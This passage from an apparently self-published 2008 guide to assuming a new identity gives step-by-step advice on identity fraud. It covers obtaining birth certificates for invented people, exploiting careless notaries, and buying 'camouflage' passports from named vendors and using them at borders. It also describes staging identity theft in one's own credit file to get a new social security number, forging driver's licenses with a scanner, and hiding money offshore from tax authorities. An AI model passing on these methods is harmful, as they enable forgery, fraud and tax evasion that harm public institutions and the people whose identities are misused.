+home in which she last lived. Her signature would be shaky +and a bit weak due to her advanced age. +But you should scan the list of required documents and +decide for yourself which documents will suit your purposes. +Sometimes a lesser document combined with a letter of +explanation will do the trick. +Again, if your request looks honest and respectable they will +probably cut you some slack and issue your BC. If you fail at +your first attempt, don’t give up – try again elsewhere. +To substantiate your new identity, you may need one or +more notarized documents. Like any group of people, some +notaries are more professional than others. +While most notaries are careful, if you shop around you may +be able to find one that is not too bright or is too rushed to be +careful. With some patience you can get almost anything by +them. There are those notaries who are much more +interested in their fee than the document's they're asked to +verify. +The "Slow and Hard" Checklist +- Find three sets of parents +- Make up three new names +- Send off requests for your non-existent BC to each state +- When forms arrive: Choose the state that requires the +least difficult proof - Then Apply for a "Delayed Record of +Birth" +- Receive new BC +- Use the new BC to get a drivers license +- Apply for a new social security number +© Copyright 2008, Ariza Research, All rights reserved - ABP - 72 - +Reproduction in any form is prohibited without written permission. + +Chapter 5 +Foreign Citizenship Method +Recently ABC news reported on a new government program +designed to discover and identify Americans who live +overseas and don't bother to file tax returns with the IRS. +Under this new program, when American expatriates go to a +US embassy to renew their US passports, they are asked for +their social security number. The number is then checked +against a growing database of expatriate tax dodgers. +Remember, under IRS rules ANY money you earn anywhere +in the world, be it through wages, dividends or corporate +profits, is fully taxable by the IRS no matter where in the +world you live and no matter what local taxes you are +required to pay! The US is the only major country on the +planet that is arrogant enough to make such a ridiculous +demand. I doubt that Adolf Hitler would have considered +making such an obviously unenforceable demand! +Many ex-pat tax avoiders now simply let their US passport +expire and then replace it with one from a new country. (one +that doesn't bother to track and tax their citizens outside their +own borders.) +Many countries have programs specifically designed to meet +ex-pat Americans' special needs. They offer "economic +citizenships" or "economic development citizenships". The +newest entrant in this game is Grenada. By purchasing a +Granadian citizenship you get a passport that is accepted in +© Copyright 2008, Ariza Research, All rights reserved - ABP - 73 - +Reproduction in any form is prohibited without written permission. + +over 60 countries without having to bother with entry or exit +visas. +Many tax dodgers have their own businesses incorporated +(anonymously) in Panama, Belize or Grenada. These +countries have very low, or non-existent taxes on small +businesses. +And their governments couldn't care less about foreigners’ +travels or business activities as long as they don't draw any +international attention. You can't be sued. (No one can find +out exactly who owns your corporation as it's registered only +in your agent's name) +You can travel without being tracked (provided you book +your tickets outside the US) and Uncle Sam will have no +idea where you are or what you're up to. You'll drop right off +the IRS's radar! +And keep in mind that there are very few extraditions to the +US for tax or business reasons no matter where in the world +the suspect lives. +Your new citizenship can usually be arranged without having +to pay a personal visit to "your" new country. (This is a +problem as the government will be fully aware of if you travel +on a US passport and arrange your trip through a US travel +agent). +If you take this route be sure to ask if you can change your +name at the same time. Most countries will ask for a "police +statement" proving that you are not wanted by the authorities +in your home country and are not a fugitive fleeing justice. +They may also ask for a similar Interpol clearance. A written +statement from a friend or clergyman attesting to your good +character may also help move things along. +Once the required documents have been received (reports +have surfaced that some applicants have used forged +documents rather than go through the hassle of procuring +the genuine items), you get your new passport, citizen's +identification and local drivers license, all in your new name. +From there it's simple to open a bank account that provides +a MasterCard or Visa debit card (and ATM card) that +© Copyright 2008, Ariza Research, All rights reserved - ABP - 74 - +Reproduction in any form is prohibited without written permission. + +provides you with untraceable worldwide access to your +funds no matter how far you wander. +A Russian friend recently obtained a Granadian citizenship +and has transferred his family savings into a Panamanian +bank. He then set up an anonymous Panamanian +corporation to run his new business. Rumor has it that the +Russian government is planning on confiscating the +passports of it's wealthiest citizens to help slow the flow of +capital out of the country. +Could something like this happen here in the US? Several +billionaires have recently moved to the Bahamas taking their +considerable fortunes with them. +Numerous outfits have appeared on the Internet that can +quickly and easily transfer your funds to offshore locations. +All we can say for sure is that Uncle Sam is extremely +worried about this rapidly growing trend. (According to a +recent US State Department study there are now over +200,000 American ex-pats now living in London, England +alone!) +Recent US federal laws have been passed aimed at +reducing or eliminating the death taxes that many of these +rich expatriates are objecting to in an effort to reverse this +tide of rich refugees. +The US Congress is currently reviewing the laws and +regulations regarding the transferring of funds offshore. You +can expect legislation to be passed during the next few +years that will drastically increase the penalties for +transferring funds out of the US. +If you do choose to deal with an offshore bank - be sure to +pick one that has NO branches or other operations within the +US. If they have some business here, the US government +can gain access to their records by dragging them into a US +court and threatening to close down their US operations. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 75 - +Reproduction in any form is prohibited without written permission. + +Chapter 6 +Camouflage Passport Method +Just when you think you’ve heard of every possible way to create +a new identity – a completely new wrinkle pops up. We get a lot of +very interesting feedback from our readers and over the past few +months we’ve been hearing quite a bit about an entirely new +approach to creating a new identity. +Americans who travel overseas have a very real problem. When a +terrorist hijacks an airplane they usually seize the passports of +their captives in an effort to single out the Americans and Israelis +for murder or torture. Let’s face it, for whatever reason Americans +are high-priority targets. +This need has given rise to a whole new type of product. – enter +the camouflage passport. For a fee there are several firms that +advertise widely on the internet who will sell you a fake passport +which you can carry with you during your travels. This fake will +appear to be issued by some small, unimportant country that no +longer exists or never did (your friendly terrorist won't have any +way to verify a passport’s validity). It will also include some very +official looking exit and entry stamps that appear to document your +recent travels +If your plane is grabbed, you simple give the terrorists your fake +passport instead of your US version, which avoids you being +identified as an American. Carrying one of these beauties can +quite literally save your life. US intelligence agencies both civilian +and military have long used this approach and have been happily +issuing their key people alternative identity travel documents for +this same reason. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 76 - +Reproduction in any form is prohibited without written permission. + +Buying one of these phony passports is completely legal as +they’re issued in the names of small colonial countries that no +longer exist - at least not officially. Some of them are very well +done and look very official. One of the more popular passports is +the old red Soviet one. Did you know that there are over six million +Russian citizens who still carry an old-style red Soviet passport? +The Russian government wants to replace them but money is very +tight in Russia these days so it will probably take a decade or +more to update them all. +These passports can be purchased bearing the following +national identities: +British West Indies (never existed – is a group of English +speaking Caribbean islands. Including British Virgin +Islands, Cayman Islands, The Turks and Caicos Islands +and Montserrat – This passport would appear to be British +and would appear to be issued by islands that are still +officially British owned) +British Honduras (Now Belize) +British Guiana +Soviet Union (Now Russia) +New Hebrides +Dutch Guiana (Now Surinam) +Netherlands East Indies +South Vietnam +Spanish Guiana +Eastern Samoa +New Grenada +Republic of Zanzibar +© Copyright 2008, Ariza Research, All rights reserved - ABP - 77 - +Reproduction in any form is prohibited without written permission. + +You can get your new passport in any name you choose (of +course the name should match your new nationality and your +ethnic appearance) and most of these firms also include a driver’s +license (both national and international versions are available) and +a resident identity card to support your new identity. One throws in +a very impressive employee ID for a major international +corporation. +Of course using a camouflage passport to attempt to enter or +leave a country would be very unwise and completely illegal. But +from what we hear there are a number of brave souls out there +who have done just that. +If you attempt to travel in Europe using your new Soviet passport, +you will most certainly run into problems. Could someone use a +camouflage passport from a Latin American nation to get into a +south pacific island? Or perhaps you might get into a South +American nation using your new Soviet passport. +We've even heard of those who have used their new identity +documents to obtain a new social security number/card. The +clerks at drivers license bureaus have no way to verify a foreign +passport and will usually just get rid of you as fast as possible. +Only the INS and the cops can verify a green card. Everyone else +is left to guess. +Do you look or sound like a foreigner? If you do – so much the +better! And even if you look like a sheet-white corn-fed Methodist +from Nebraska, there are always those old British colonial +countries where English is the official language. If you look a little +like an eastern European, you might want to consider the Soviet +passport. If you’re Hispanic you might take a look at a Central +American version. An oriental might want to consider a South +Vietnamese passport. +A reliable source has informed us that there are several tens of +thousands of Hispanics living (and working) in California who are +using exactly this approach. +If you can learn to speak a bit of Dutch, you might pass yourself +off as a resident of Dutch Guiana. When Dutch Guiana became +the independent nation of Surinam, the locals were offered full +Dutch citizenship if they moved to Holland. Some citizens decided +to stay and retain their old passports and other identity +documents. +Blacks should look into either a Dutch Guiana or British West +Indies passports, as many of their citizens are black as they're +descendents of African slaves. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 78 - +Reproduction in any form is prohibited without written permission. + +When British Honduras became the independent country of +Belize, many citizens chose to keep their old passports so there +are still many of them around. Of course English is the official +language so all you’ll need to learn is how to drink warm beer! +The group of south pacific islands formerly known as the New +Hebrides became Vanuatu, which is fast becoming one of the +premier offshore banking centers of Asia. (If you hunger for real +personal and financial privacy, you might find Vanuatu very +interesting.) +You should also know that the much-forged “green card” can be +obtained quite easily on the black market. (60 minutes +demonstrated just how easily when they bought one on the streets +of Los Angeles in a half hour or so.) +They're widely sold in the border areas along the Mexican border. +Green card forgery is fast becoming big business wherever illegal +aliens are found. Besides, there are so many different versions of +the green card out there that no one really knows a forgery when +they see one. +You can find many varied sources for camouflage passports by +doing a quick search on any of the major search engines (I prefer +google.com as it's quite comprehensive) under "camouflage +passport". Prices run from around $195 to over $600 so shop +around for the best deal. +Update: November 2005: A mail-order firm called NIC Law +Enforcement Supply sells a nice camouflage passport for +$249 (a very good price given the quality). You provide two +passport style photos (in different clothes and perhaps +different hair styles so they look like they were taken on +different dates). They provide a handmade camouflage +passport and a matching drivers license. +They also provide entry and exit stamps to make the +passport look used. Your passport/drivers license can be +issued in any name you like. You can also specify a new +date of birth. Two supplemental ID documents are provided +(one is a drivers license while the other might be a resident +ID or a national ID card of some sort). Unfortunately NIC +doesn't allow you to chose which country you prefer. Instead +they ask you which part of the world you'll be traveling in and +then promise to provide a passport from a distant part of the +world. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 79 - +Reproduction in any form is prohibited without written permission. + +They even provide a home address in your new country. You +can also list a wife and children. +They also sell a nice variety of ID products including some +very useful holograms, seals and a ton of official looking +badges for collectors. NIC Law Enforcement Supply can be +reached at 1-888-642-0007. Ask for their latest catalog. +Their address is: +NIC Law Enforcement Supply +500 Flournoy Lucas Road Bldg. #3 +Shreveport, LA +71135-5950 +You might at this point be asking yourself why those in +power would allow these passports to be sold so openly? +Official looking documents like these are obviously very +useful to freedom loving types so why don't they just ban +them? The answer is simple. +The rich and powerful elite in the US use them all the time +and find them quite useful (for protection during highjackings +and for opening offshore bank accounts) so they remain on +the open market even though their use may violate several +federal laws. +A quick note here: I can't seem to find anything specific on +the subject but one camouflage passport site has shut down +due to "the new government regulations regarding +camouflage passports". +As of 7-04 here are some active camouflage passport sites: +(I cannot endorse these firms nor their products however) +http://www.privacyworld.com/auto/campp.html +http://www.immigration-world.com/interest/haki-eng.shtml +http://www.finor.com/en/camouflage_passports.htm +© Copyright 2008, Ariza Research, All rights reserved - ABP - 80 - +Reproduction in any form is prohibited without written permission. + +http://www.expatworld.org/book8.htm +http://australianz.topcities.com/camouflage.htm +http://www.republic-of-lomar.org/information/procedure.htm +http://www.maildropnet.com/dlidpp/camel.htm +http://passports.netfirms.com/camouflage.html +http://www.vienna.cc/networld/camou.htm +Some of the sites above list a wide range of other ID products but +I'd be very skeptical of their quality claims. Any firm located inside +the US will certainly be peddling garbage (or they'd quickly end up +in jail). +Birth Certificate Numbering +There’s one small hitch here. There are scads of sites out +there selling blank birth certificates and templates. Avoid this +mass marketed junk. Big brother is on to you and has +provided their clerks with books full of samples of these +clunky fakes. Anyone who attempts to use one will soon end +up in a world of trouble. +A quick note concerning the numbering of birth certificates: +The first digit is always a one for those born in the USA. +Then there is a dash and a second number, which is the +two-digit year of birth. This is followed by a random group of +numbers assigned locally by the issuer. When you create a +"new" birth certificate, be sure the number follows the +following rules: +If the registration number is: +#1-73-54898 +The code breaks down as follows: +1- -Born in the USA +73- -Born in 1973 +54898 -Random registration number +In the past a good story and a single document such as a +birth certificate and/or a baptismal certificate (or if you're +Jewish a circumcision certificate is more or less the same +thing) would get you through. Now you'll need more. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 81 - +Reproduction in any form is prohibited without written permission. + +You'll need to assemble a collection of what used to be +called "wallet stuffers". The kind of lower quality ID that's +much easier to come up with yet still helps establish your +identity and support your story. +So what's the bottom line here? You'll have to be prepared +more thoroughly than before. More planning and careful +execution will be required. But for the time being not all that +much has changed. +Keep in mind that as of the summer of 2004, there’s still very +little cross-referencing of birth and death records across +state lines. But stay tuned as legislation passed and signed +into law in early 2004 provided $350 million for just that +purpose. But if you stop and think about it – it will take years +before even part of the records are correctly updated. +But how could they ever know where the man was born or +where his birth certificate is recorded? They could perform a +state-wide search within Alabama but what would they do if +no birth record could be found? With over 7,000 national +offices authorized to create birth certificates, how could they +ever hope to locate his birth certificate? +At some point in the distant future all these records will be +computerized under (you guessed it) your social security +number. Then nation-wide searches will be both fast and +simple and the records will be 100% cross-referenced. But +given a lack of funding and pressure from civil rights groups, +those days are easily a decade away. +Another little tip regarding birth certificates – certified copies +are easier to obtain in the following states: California, +Kentucky, Maine, Massachusetts, Minnesota, Nebraska, +New Jersey, North Carolina, Ohio, South Dakota, Vermont, +Washington and Wisconsin. The rest restrict access to birth +records in some way. If you run into a problem in one state, +move on to another. Some states still regard their vital +records to be public property and open to anyone who asks. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 82 - +Reproduction in any form is prohibited without written permission. + +National ID Update +In the new "Homeland Security" bill you'll find the following +rather interesting language: +"Nothing in this act shall be construed to authorize the +development of a national identification system or card." +Here's some more good news. The current administration +has expressed their disinterest in establishing a national ID +card on many occasions. But of course there's no guarantee +that future administrations will see things in the same way. +Talk about strange bedfellows. This issue has so inflamed +privacy advocates that the conservative Eagle Forum and +the liberal ACLU joined forces to fight any attempt by the +federal government to establish federal standards for the +issuance of state drivers licenses. +They view this approach as an attempt to transform our +driver’s license into a national ID card. According to these +two groups federal interference in the issuance of drivers +licenses "would be a severe hit to basic privacy rights in +America". +This whole subject is so politically sensitive that the White +House itself told it's minions that they are never to use the +term "national ID card" nor are they to enter into any kind of +debate on the subject. The entire subject is strictly taboo. +But there will be changes ahead that will reduce our privacy +and increase government monitoring and control of our +movements. In the year ahead the aviation industry will be +establishing a "trusted traveler" system. The plan now on the +table would make the system completely voluntary and will +be run by a private firm. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 83 - +Reproduction in any form is prohibited without written permission. + +You fill out a comprehensive application that includes a +wealth of personal information. The security company will +then check you out by verifying as much of the information +as possible. Verification will be the rule - they will take little +or nothing at face value. +Only after the information you’ve provided has been carefully +verified would your new card be issued. With it you bypass +the long security lines at the airport and zip through a quick +scan of your card and you're quickly off to your plane while +the other passengers stand on those long slow lines. +Since the system is entirely voluntary, you could choose to +not apply and choose to stand in line. The choice is yours. +This system is already in pilot operation in some airports. +Could this kind of "trusted" system expand into other areas +of public life? +Way back in 1961 former President Dwight D. Eisenhower +warned us that the greatest challenge to our freedom would +come from a combination of military contractors and the +pentagon which he labeled "The Military-Industrial +Complex". Are we now entering Eisenhower's nightmare? +Only time will tell. +In this edition we have several new systems to report on. I +want to thank those who have provided feedback and taken +the time to share their experiences. We know you'll find the +details as interesting as we did. +Social Security Bureaucrats Finally Give In! +Update: I had an interesting chat with a social security +worker recently. He revealed that in 1999 the social security +administration had issued only 155 new social security +numbers under the program discussed below. In the year +2000 the number grew to over 1500 and this year the +number will be much higher. When I asked how high, he said +"at least ten times the 2000 levels". This radical change in +policy should be used by anyone who can qualify. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 84 - +Reproduction in any form is prohibited without written permission. + +For far too many years the bureaucrats at the social security +administration have steadfastly refused to allow individuals +to change their social security numbers no matter how dire +their personal circumstances. Several women and children +have recently been murdered simply because they were not +allowed to change their social security numbers (and thus +escape their pursuers). +But it looks as though all the dead bodies and bad press are +at long last having an effect. The social security +administration has now announced a new policy that should +be of interest to those who can qualify. +Now for the first time the bureaucrats will actually let you +change your social security number if you can prove that +you’ve been the victim of identity theft. (An individual could +qualify for a number change and then later legally change +their name) +Of course the paper-pushing bureaucrats will require that +you document the theft of your identity. At first the +requirements may seem strict and difficult, but they're not if +you examine them in detail. +To qualify under this new policy, you'll need a credit report +that shows that you've had your identity stolen, usually for +financial reasons. Someone has submitted a credit card +application using your name and their address. +They usually use the address of a unsuspecting friend, or +they hire a secretarial service to provide an address or they +rent one of those commercial mail boxes using a fake id. +Once they have a new credit card in your name, these +criminals start spending. Once they start using the card, their +payment history is going to pop up on your credit report. This +is the proof that identity theft is going on. Once your credit +file has several of these unauthorized cards on it, you may +qualify for a new social security number. +(Several especially creative (and dedicated) individuals have +actually created all the signs of identity-theft in their own +credit records in order to get a new social security number +though I'm sure some aspect of what they've done is illegal.) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 85 - +Reproduction in any form is prohibited without written permission. + +If this happens to you, call your credit-reporting agency and +report the violation immediately. Ask for a copy of your +current credit file. Check with all three major credit-reporting +agencies to be sure you have them all. Assemble all the +documentation you can find. You might even want to talk to +a lawyer, as they may be able ease the social security +number change process along. +Here are some details on identity theft, which should help +you protect yourself against this growing problem. If you live +in an apartment identity thieves often pry open individual +mailboxes in order to obtain banking and other mail that will +give them the personal information they need to steal your +identity. +After a break, you may have noticed that your mail flow was +suddenly restored but you did notice that your normal +monthly bank statement didn't arrive as usual. Identity +thieves file change of address forms that interrupt their +target's mail for three or four day. This is the usual story for +victims of identity theft. +If you feel that you now qualify for a number change but can't +get the SSA clerk to agree. Politely ask for their supervisor +and see if they will be more sympathetic. If they refuse, take +the whole matter to your senator or congressman. It's their +job to help you in your struggles with government agencies. +Though they will never admit it, government bureaucrats +deeply fear letter writers and complainers. As long as no one +complains to a higher authority, these clerks can get away +with murder (which is what they've been doing for some +years now by ignoring abused spouses) but when you get +someone with some real power involved, the whole situation +can rapidly change. They know that one well-worded letter +can land an entire agency in hot water. +If your clerk is still refusing you help, don’t direct your anger +toward the clerk but instead keep reminding them of how +much grief this identity thief has put you through and how +badly you need some relief. Demand that the clerk provide +you with the official document that details the provisions of +the new identity theft policy. Information is power and a +careful review of their policy will give you the ammunition +© Copyright 2008, Ariza Research, All rights reserved - ABP - 86 - +Reproduction in any form is prohibited without written permission. + +you need to prove your claim. Also demand information on +the Social Security Administration's appeals process. +Armed with solid documentation and some Washington +influence, you should be able to win yourself a new number. +Here are the Social Security Administration's notes (taken +from their official manual): +1. You must prove to their satisfaction that someone else is +actually using your social security number to: +1. Illegally apply for government benefits (welfare, +food stamps, unemployment compensation, and +educational loans). +2. Obtain credit/credit cards (in your name). +3. Obtain employment (illegal aliens, fugitive +criminals). +4. Pursue other illegal activities (obtaining benefits +under workers' compensation). +5. Hide income from lawful taxation. +6. Evade lawful prosecution for past crimes. +7. Harass and/or stalk you. +8. Cash in government bonds (taxes are due from the +person cashing in the bonds, not the purchaser) +9. File fraudulent income tax returns (claiming non +existent refunds) +2. Whatever problems you are having, they must not be the +result of your actions. +3. You should be armed with documents from third parties +supporting your claim. (police reports, letters from credit +agencies or credit card banks, bill collectors) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 87 - +Reproduction in any form is prohibited without written permission. + +4. Your credit status must be negatively affected. +5. You must be "significantly affected". +You will be turned down flat if: +1. They conclude that you are seeking a new number +to escape the legal consequences of your own acts. +2. If your poor credit record is the result of your own +lack of financial responsibility +3. You're seeking to escape problems caused by a +past bankruptcy +4. You desire to be issued a particular number +5. Others used your social security number in a lawful +way +6. Your proof is insufficient or your story is not +sufficiently convincing +There is an alternative approach that has worked for many +others. If you claim that someone is stalking you with intent +to do you harm, (and you can somehow document your story +- preferably with police reports), you may be successful. But +your story must be believable and you must have some +impressive proof. Taking along a witness can work if they +are willing to sign a sworn statement. +The use of duplicate social security numbers was not much +of a problem until the passage of the Immigration Reform +Law of 1986, which required a worker to supply a new +employer with a copy of their social security card before they +could begin employment. This law triggered an explosion in +the use of duplicate numbers as illegal aliens struggled with +the new restriction. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 88 - +Reproduction in any form is prohibited without written permission. + +Additional Notes: +The Social Security Administration is now running TV ads in +an effort to spread the word about their new policy regarding +domestic abuse. Anyone who can document domestic abuse +(either male or female) can now obtain a new social security +number. +I don't have the latest details on this one yet as my local +social security office only has an announcement that the +policy has been changed but is still waiting for all the details. +This could be very useful for those who can qualify. Check +the official social security website for the latest details on any +of these new programs as they may change. +Social Security Loophole +When a private business asks for your social security +number, it's almost certain that they have no legal authority +to make such a request. They're just trying to get away with +something. Most Americans are sheep and will provide their +number without giving it a thought, almost as a reflex. But +you're different. +A useful strategy is to ask for their legal authority, as they +scratch their head in confusion (very few people challenge +any kind of request for personal information in our open +society), mention that in the past you had your identity stolen +and have no intention of going through that again! Add that +your attorney has given you strict instructions to only release +your social security number to those legally entitled to it. No +exceptions! +But there's another interesting loophole in the laws regarding +social security number usage. There are those amongst us +who believe that the bible predicts our future. In one part of +the book of revelation it says something about the antichrist +taking over society and requiring that each of us be given the +"mark of the beast" without which no one will be allowed to +buy or sell. +Could the social security number be that long anticipated +mark? I don't know but plenty of folks believe it is and that's +all that matters. The result is a special allowance for those +who have a "religious objection" to using their social security +numbers. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 89 - +Reproduction in any form is prohibited without written permission. + +Our friends in the government have actually come up with a +special form for such holy individuals. You state your +religious objection to providing your number and request +they provide you with the appropriate form. You fill it out and +a separate number is used in your records. +Does this work? Yes, it does and it works because it's official +government policy. It will work even for those who apply for +federal or state welfare programs, though you can expect +that it will raise a few eyebrows. +A quick phone call before you visit will let you know if the +people you're about to deal with are up to date on this new +regulation. +A Quick History of the Social Security Number +When the social security system was first introduced there +was a good deal of concern that the numbering system it +used would lead to each of being numbered by the +government. Of course the government promised that they +would never use this number for any other purpose than to +track your retirement account. +The first social security cards included a note on the bottom +to that effect. It said "Not for identification". The government +rules also barred the social security administration from +placing other personal ID type information on the card. Only +the name and number could appear. Until recently there +were federal laws that blocked any government agency from +collecting personal information on individual citizens. +Of course that rule was completely crushed by the so-called +Patriot Act. Now as you read this the feds are busy building +centralized dossier files on each of us which leaves our +freedoms at jeopardy. +Now the number is being used to track every aspect of our +lives. It's now your employee number at work, your account +number on most forms of insurance, your official taxpayer +identification number with the IRS, your voter registration +number, your drivers license number (in some states), your +student ID number at almost any kind of school and let us +not forget how the credit reporting industry tracks us with it! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 90 - +Reproduction in any form is prohibited without written permission. + +Though there are new laws that will threaten people with +drastic new punishments for using a fake social security +number, there are many brave souls who have used them. +Because this is now illegal, I can't endorse such an act. +Fake ID +Fake id is a bad deal. There are new laws in almost every +state that make it a serious crime to even use a fake drivers +license. Sadly the good old days when you could carry +around several fake ids in your pocket that you could use +with impunity are sadly gone. After 9/11 things got even +tighter as the drivers license has taken on a whole new role, +particularly when you try to fly through an airport. +When applying for a certified copy of your birth certificate, +you’ll need a photocopy of your driver’s license. One clever +soul has reported that it's very easy to doctor a black and +white photocopy of your genuine license. +Before you send off your hard-earned money to some slick +fake id outfit you saw on the web, take the firm's name and +do a search using your favorite search engine. Chances are +you'll find numerous complaints from those who have been +ripped off by the site. +Though I have no direct knowledge, a company called +"Promaster" advertises widely on the web but we've noticed +a slew of complaints from suckers who never received their +ID. Our favorite search engine for investigating these outfits +is google.com. +Homemade Fake ID +The single most common need for a fake id comes when you +rent a mailbox (from one of those commercial mail box +companies). These outfits don't have any way to verify the +license you provide so you can usually get away with using a +not-quite-perfect DL. +Some have found the following useful. Today's PC +technology has provided us with some useful tools. Today +you can buy a high quality color scanner for around $100. If +you want one of the top models (look around CNET for the +© Copyright 2008, Ariza Research, All rights reserved - ABP - 91 - +Reproduction in any form is prohibited without written permission. + +latest equipment reviews) you'll have to shell out somewhere +around $250. USB scanners are best as they transfer data to +your PC much faster than the old units that connected via +the printer port. +You simple scan your existing genuine driver’s license into +your computer, change the typed personal information and +then print out the result. You'll need some good graphics +software and a good, high-qualify printer. The result will be a +new license that isn't all that bad. You could never hand it to +a cop or today even a bouncer, but it can certainly get you a +new post office box. +Be careful though - the overall image quality (resolution) +should be 2,400 dpi. This includes the scanner, software and +the printer. Anything less will provide a "fuzzy" looking +product that will instantly arouse suspicions. +Today, making a reasonable good-looking fake drivers +license is easier than ever before. But if you want a really +good-looking license that will pass even a comprehensive +examination - You'll have to be a technical genius to crank +out such a license on your home PC. The few people who +still deal in fake id have sophisticated systems complete with +expensive software and very expensive and hard-to-find +high-resolution printers +If you do manage to find some fake id on the web, it will +probably disappoint you. +One clever individual came up with this sneaky idea. The +magnetic strip on the back of a fake id can be added quickly +and easily by simply cutting up some good old cheap VHS +video tape. He just cut up several inches of tape until it +looked right. +Also, if you check around the web you'll find plenty of places +that offer to sell "templates" of genuine blank licenses. Of +course the quality varies widely so be careful not to spend +too much for them. +Unfortunately the best graphic software packages are rather +expensive though 30-day trial versions are usually available +for free download. Templates of New Jersey licenses are +© Copyright 2008, Ariza Research, All rights reserved - ABP - 92 - +Reproduction in any form is prohibited without written permission. + +usually of very low quality and outside New Jersey, their +licenses are often very carefully examined for this reason. +(Update: the feds have been cracking down on the open +distribution of DL templates so they're harder to find. +Paper Tripping - Adopting the Identity of a Deceased +Child +Perhaps you’ve heard about people who’ve assumed the +identities of deceased children by obtaining identity +documents using the information from their cemetery +headstones. If you think this approach sounds inviting, go +rent the movie "The Coneheads" and watch what happens to +Beldar Conehead when he attempts to "share" an identity +with one "Donald R. Decicco". +He quickly pops up on a computer along with about a dozen +other people who are using the same identity and social +security number. The immigration authorities have a good +laugh recalling all the losers that have used the Decicco +identity over the years. +The result - Mr. Beldar is immediately arrested. If you use +this grossly overused technique, you'll be breaking the law +and can expect to be sharing your "new" identity with several +other people. Think about it - is that really what you want to +do? +The problem with adopting another’s identity is that you can +never be sure exactly who you’re sharing the identity with. +There is simply no way that you can know how many others +have visited the same gravestone you have. Do you really +want to take the chance that you’ll be sharing an identity with +one of the FBI’s ten most wanted criminals? Or perhaps you +might like to share an identity with a cop-killer? Or an +international terrorist based in the Middle East? +One lady I know borrowed an identity from a gravestone only +to find a dozen cops surrounding her motel room 10 minutes +after she checked in! Though she had done nothing illegal, +she spent two days in jail while the FBI checked out her +story and eventually cleared her. It seems like someone else +© Copyright 2008, Ariza Research, All rights reserved - ABP - 93 - +Reproduction in any form is prohibited without written permission. + +(a criminal wanted for a murder and bank robbery) had +visited the same gravestone she had! +Recently several new reports have appeared that attempt to +resurrect this useless approach. They now claim to have +perfected methods that will assure that a particular infant’s +identity hasn’t yet been used. Don't believe them. +Even if you could be sure your infant’s identity is a virgin +one, how can anyone know who will attempt to share the +identity at some point in the future? +Now go rent the excellent movie "The Shawshank +Redemption" and see how a properly created new identity +can give someone (and his friend) a second chance at life. +A TRUE STORY +A friend thought that he had found a new way to resurrect +and use the identity of a deceased infant without having to +share it with anyone. I warned him about the dangers of the +classic dead infant "Paper Tripping" system but undeterred +he ventured out into a remote rural area where he found a +small church cemetery that looked as though no one had +visited it for years. +It was covered in thick vines and weeds. With considerable +effort, he managed to hack through the heavy grass that had +grown over a small grave in a remote area of the cemetery. +He was sure that no one had been there for ages. Surely no +one had ever found this grave before! +Using the information on the headstone, he easily located +the obituary in the local newspaper (at the library) which +gave him all the information he needed to get the death +certificate. +But when he finally requested the birth certificate, all he got +for his efforts was a form letter informing him that no birth +certificate would be forthcoming due to "excessive requests"! +Even though the gravestone was extremely difficult to find, +somehow others (many others) had requested copies of the +birth certificate in the recent past. +Our friends in the genealogy business publish books that +contain the inscriptions on headstones from all over the +© Copyright 2008, Ariza Research, All rights reserved - ABP - 94 - +Reproduction in any form is prohibited without written permission. + +country. Perhaps several identity-changers are using these +books so even abandoned and overgrown grave markers +aren't safe these days. +You should also know that many states are busily cross- +referencing their birth and death records (Canada has +already done this). The cross-referencing process here in +the US won't be completed for a decade or more. +If your target's birth and death have been cross-referenced, +you will be rewarded for your effort with a birth certificate +with "DECEASED" stamped across it in inch-high letters in +bright red indelible ink. Also, anyone who attempts to verify +the certificate (like the Social Security Administration or the +passport people at the US state department) will be promptly +informed that you are dead. Clearly, such a document is +useless. +Using a Mail Drop +Most identity changers start out by obtaining a new “home” +address where mail can be received. They usually use one +of those storefront PO box outfits. They avoid using an +official US post office box. The best units are the ones that +provide 24-hour access to the rented box. This way a box +renter can pick up their mail late at night when no one is +around. +They phone and request an application. They pay in cash or +with a money order. Most box renters use the boxes for +routine business mail as they don't have a local office. When +the box has been secured, they request some catalogs or +other routine looking mail. Receiving too little or too much +mail might cause problems. +The National ID Problem +Some elements in the federal government are seeking to +create a highly-fraud resistant, easily verifiable national ID +card in several different ways. The first approach would have +the Social Security Administration transform the current +© Copyright 2008, Ariza Research, All rights reserved - ABP - 95 - +Reproduction in any form is prohibited without written permission. + +Social Security Card into a sophisticated passport-type +document that would include a digitized photograph printed +right into the paper (instead of the more easily altered glued- +on photo), sophisticated high-tech features like bar-coding +and enciphered magnetic coding. +The card would probably include fingerprints in a format that +can be easily verified through the FBI's new online fingerprint +system. Such a document would be virtually impossible to +alter or counterfeit. Draconian new laws would include huge +penalties for anyone who attempted to use the document in +an unauthorized manner. +In addition, this new card would contain a chip into which a +wide range of personal data could be entered and then +retrieved and viewed by anyone who had access to the card. +The federal government is working feverishly to organize +and cross-index various databases in an effort to assemble +huge databases of personal data on US citizens. +Commercial interests are getting into the act also as several +airlines have proposed a "privileged traveler" system that +would link dozens of federal databases with the airline +reservation system. The system would allow frequent +business flyers to bypass long security lines and stroll +directly onto waiting planes without the usual scrutiny and +delays. +Many different bills are sloshing their way around +Washington that all have a common cause - to make it more +difficult to obtain any useful form of personal identity +documents. Criminals and Illegal immigrants have long +known that the southern states have less demanding +application requirements and since anyone can apply for a +license in any state, they flock to the more lenient states. +If they need a license in a more restrictive state, they simply +obtain a license in the easiest way possible and then use it +to obtain a new license in their desired state. This weakness +is now well known in Washington and there legislators are +looking at how best they can tighten up the application +procedures on a nation-wide basis. +Many states are training their clerks so they can more readily +recognize phony ID documents, particularly birth certificates +and fake drivers licenses. The government has created +© Copyright 2008, Ariza Research, All rights reserved - ABP - 96 - +Reproduction in any form is prohibited without written permission. + +bound volumes with images of the most widely sold +documents. For this reason anyone tempted to purchase +blank ID documents on the web should think again. +The most successful identity changers prefer to use +documents they created themselves on their own computers. +Following the same basic design as a genuine document +seems to work best. +In a decade or so you can expect the feds will standardize +US birth 